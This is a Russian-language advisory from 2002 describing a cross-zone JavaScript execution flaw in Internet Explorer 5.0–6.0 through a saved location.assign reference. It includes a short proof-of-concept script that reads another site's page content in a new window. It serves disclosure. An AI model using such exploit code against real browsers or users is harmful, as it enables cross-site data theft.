Выполнение произвольного javascript кода в любой зоне в Microsoft Internet Exploer

Дата публикации:
02.10.2002
Дата изменения:
17.10.2006
Всего просмотров:
1229
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Обнаруженная уязвимость в Microsoft Internet Exploer позволяет удаленному атакующему выполнять произвольный javascript код в любой зоне, записывая ссылку из "(NewWindow).location.assign".

Эксплоит:

<SCRIPT>
function f()
	{
	}
w=window.open("nothing.htm","_blank","height=150 width=150 left=0 top=0");
f=w.location.assign;
w.location.href="http://www.yahoo.com";
alert("wait for the page");
f("javascript:alert(document.body.innerHTML)");
</SCRIPT>
уязвимость обнаружена в Microsoft Internet Exploer 5.0-6.0

Ссылки: MSIE:"SaveRef" turns Zone off
http://www16.brinkster.com/liudieyu/SaveRef/SaveRef-MyPage.htm
или введите имя

CAPTCHA